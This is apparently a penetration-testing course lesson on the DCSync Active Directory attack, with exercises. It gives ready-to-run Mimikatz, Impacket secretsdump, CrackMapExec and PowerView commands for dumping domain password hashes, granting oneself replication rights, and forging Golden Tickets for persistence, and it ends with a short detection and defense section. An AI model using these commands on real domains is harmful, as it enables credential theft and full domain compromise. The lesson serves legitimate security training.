DCSync Attack

advanced35 minWriteup

Extracting credentials by impersonating a DC

Learning Objectives

  • Understand DCSync attack
  • Identify required permissions
  • Extract all domain hashes
  • Use DCSync for persistence

DCSync is arguably the most powerful Active Directory attack. It doesn't hack the Domain Controller - it impersonates one. By requesting password replication (a legitimate DC function), you can extract any account's password hash, including KRBTGT for

.

Think of it like being a new employee at a bank who has "permission to access the vault." You don't break in - you walk through the front door with credentials. The DC thinks you're another DC requesting a routine sync.

No Malware Required

DCSync uses legitimate Windows APIs. It's not a vulnerability to patch - it's how AD replication works. The "vulnerability" is having accounts with excessive replication rights.

How DCSync Works

1Normal AD Replication:
21. DC1: 606070;">#a5d6ff;">"Hey DC2, I need password updates"
32. DC2: 606070;">#a5d6ff;">"Sure, here's the data" (MS-DRSR protocol)
43. DC1 receives password hashes, Kerberos keys, etc.
54. This is how all DCs stay synchronized
6 
7DCSync Attack:
81. Attacker has DCSync rights (or compromised account that does)
92. Attacker: 606070;">#a5d6ff;">"Hey DC, I'm a DC and need password updates"
103. DC: 606070;">#a5d6ff;">"Sure, here's the data"
114. Attacker receives password hashes for any/all accounts
12 
13Key insight: The DC doesn606070;">#a5d6ff;">'t verify you're actually a DC.
14It just checks if you have replication rights.

Required Rights

1DCSync requires these rights on the domain object:
2├── DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
3├── DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
4└── (Optional) DS-Replication-Get-Changes-In-Filtered-Set
5 
6Groups with DCSync rights by default:
7├── Domain Admins
8├── Enterprise Admins
9├── Administrators
10├── Domain Controllers
11└── (Often) Exchange Windows Permissions ← Common escalation!

Checking for DCSync Rights

powershell
1606070;"># PowerView - Find users with DCSync rights
2Get-DomainObjectAcl -SearchBase 606070;">#a5d6ff;">"DC=corp,DC=local" -SearchScope Base -ResolveGUIDs |
3  Where-Object {
4    ($_.ObjectAceType -match 606070;">#a5d6ff;">'DS-Replication-Get-Changes') -or
5    ($_.ActiveDirectoryRights -match 606070;">#a5d6ff;">'GenericAll')
6  } |
7  ForEach-Object {
8    $sid = $_.SecurityIdentifier
9    try {
10      $name = Convert-SidToName $sid
11      [PSCustomObject]@{
12        Name = $name
13        Rights = $_.ObjectAceType
14      }
15    } catch {}
16  }
17 
18606070;"># AD Module
19Import-Module ActiveDirectory
20(Get-Acl 606070;">#a5d6ff;">"AD:DC=corp,DC=local").Access |
21  Where-Object { $_.ObjectType -match 606070;">#a5d6ff;">"1131f6a" } |
22  Select IdentityReference, ObjectType
bash
1606070;"># Impacket - Check if current user can DCSync
2secretsdump.py corp.local/user:password@dc.corp.local -just-dc-user testuser
3606070;"># If it works, you have DCSync rights!
4 
5606070;"># BloodHound query
6MATCH p=(n)-[:GetChanges|GetChangesAll|GenericAll]->(d:Domain)
7RETURN p

Performing DCSync

Mimikatz

1606070;"># Single user
2lsadump::dcsync /user:Administrator
3lsadump::dcsync /user:corp\Administrator
4lsadump::dcsync /user:krbtgt    606070;"># For Golden Tickets!
5 
6606070;"># Output:
7[DC] 606070;">#a5d6ff;">'corp.local' will be the domain
8[DC] 606070;">#a5d6ff;">'DC01.corp.local' will be the DC server
9[DC] 606070;">#a5d6ff;">'Administrator' will be the user account
10** SAM ACCOUNT **
11SAM Username         : Administrator
12Credentials:
13  Hash NTLM: a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx
14  ntlm- 0: a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx
15  lm  - 0: aad3b435b51404eeaad3b435b51404ee
16 
17606070;"># All users
18lsadump::dcsync /all /csv
19 
20606070;"># Specific domain
21lsadump::dcsync /domain:child.corp.local /user:Administrator

Impacket (secretsdump.py)

bash
1606070;"># Single user
2secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user Administrator
3secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user krbtgt
4 
5606070;"># All users
6secretsdump.py corp.local/admin:password@dc.corp.local -just-dc
7 
8606070;"># With hash (Pass-the-Hash DCSync)
9secretsdump.py -hashes :HASH corp.local/admin@dc.corp.local -just-dc
10 
11606070;"># Output format:
12606070;"># Administrator:500:aad3b435b51404eeaad3b435b51404ee:a9b30e5b...:::
13606070;"># krbtgt:502:aad3b435b51404eeaad3b435b51404ee:KEY_HERE...:::

CrackMapExec

bash
1606070;"># Using --ntds flag
2crackmapexec smb dc.corp.local -u admin -p password --ntds
3 
4606070;"># Output saved to ~/.cme/logs/

Get KRBTGT First

Always extract KRBTGT hash during DCSync. It enables
Related

Golden Tickets

 for persistence. Even if you lose access, Golden Tickets work until KRBTGT is reset twice.

Escalation to DCSync

Exchange Escalation

powershell
1606070;"># Exchange Windows Permissions group has WriteDACL on domain
2606070;"># Any member can grant themselves DCSync rights!
3 
4606070;"># Check if user is in Exchange groups
5Get-ADGroupMember 606070;">#a5d6ff;">"Exchange Windows Permissions" -Recursive
6Get-ADGroupMember 606070;">#a5d6ff;">"Exchange Trusted Subsystem" -Recursive
7 
8606070;"># If you're a member, grant DCSync rights:
9Add-DomainObjectAcl -TargetIdentity 606070;">#a5d6ff;">"DC=corp,DC=local" -PrincipalIdentity attacker \
10  -Rights DCSync -Verbose
11 
12606070;"># Now DCSync!

WriteDACL Escalation

powershell
1606070;"># If you have WriteDACL on domain object
2606070;"># Grant yourself DCSync rights
3 
4606070;"># PowerView
5Add-DomainObjectAcl -TargetIdentity 606070;">#a5d6ff;">"DC=corp,DC=local" -PrincipalIdentity attacker \
6  -Rights DCSync -Verbose
7 
8606070;"># Manual with AD module
9$acl = Get-Acl 606070;">#a5d6ff;">"AD:DC=corp,DC=local"
10$user = New-Object System.Security.Principal.NTAccount(606070;">#a5d6ff;">"CORP\attacker")
11606070;"># Add Get-Changes and Get-Changes-All rights
12606070;"># ... (complex ACE creation)
13Set-Acl 606070;">#a5d6ff;">"AD:DC=corp,DC=local" $acl

GenericAll on Domain

1606070;"># GenericAll includes WriteDACL
2606070;"># Same escalation as above
3 
4606070;"># Also possible via:
5606070;"># - WriteOwner (change owner, then WriteDACL)
6606070;"># - Compromise a group that has these rights

Using DCSync Results

bash
1606070;"># After DCSync, you have hashes for everyone
2 
3606070;"># Pass-the-Hash as Domain Admin
4psexec.py -hashes :DA_HASH corp.local/Administrator@target
5 
6606070;"># Create Golden Ticket with KRBTGT
7ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator
8export KRB5CCNAME=Administrator.ccache
9psexec.py -k -no-pass corp.local/Administrator@dc.corp.local
10 
11606070;"># Crack hashes offline
12hashcat -m 1000 hashes.txt wordlist.txt
13 
14606070;"># Kerberoast offline (you have all SPN hashes now)
15606070;"># Extract from DCSync output and crack with hashcat -m 13100

Detection & Defense

1Detection:
2├── Event ID 4662 - Operation on directory object
3│   ├── Look for: DS-Replication-Get-Changes operations
4│   ├── From non-DC source IP
5│   └── Especially if user not in normal replication groups
6├── Network monitoring
7│   ├── DRSUAPI traffic from non-DC IPs
8│   └── Unusual replication patterns
9└── Honey tokens
10    └── Monitor for access to fake accounts with DCSync rights
11 
12Defense:
13├── Minimize accounts with DCSync rights
14│   └── Only Domain Controllers should have these
15├── Remove Exchange excessive permissions
16│   └── Known issue since Exchange 2007
17├── Protected Users group
18│   └── Won't prevent DCSync but limits credential exposure
19├── Monitor for ACL changes on domain object
20├── Alert on DCSync operations from non-DC sources
21└── Regular audits of replication rights

Exchange Is Dangerous

Exchange Windows Permissions has WriteDACL on the domain by default. This is a well-known escalation path. Microsoft considers this "by design" but many organizations remove this permission.

DCSync Methodology

DCSync Attack Flow

1
EnumerateFind users with DCSync rights
2
EscalateIf needed, exploit path to DCSync rights
3
Extract KRBTGTDCSync krbtgt for Golden Ticket
4
Extract TargetsDCSync specific high-value accounts
5
Dump AllOptionally dump all hashes
6
PersistCreate Golden Ticket with KRBTGT hash

Knowledge Check

Quick Quiz
Question 1 of 3

What rights are required for DCSync?

Challenges

DCSync the Domain

Challenge
💀 advanced

With Domain Admin credentials, perform DCSync to extract the KRBTGT hash and create a Golden Ticket for persistent access.

Need a hint? (4 available)

Key Takeaways

  • DCSync impersonates a DC to request password replication
  • Requires DS-Replication-Get-Changes rights on domain
  • Domain Admins, Enterprise Admins have these by default
  • Exchange Windows Permissions can escalate to DCSync
  • Always extract KRBTGT for Golden Ticket persistence
  • Detected via Event ID 4662 from non-DC sources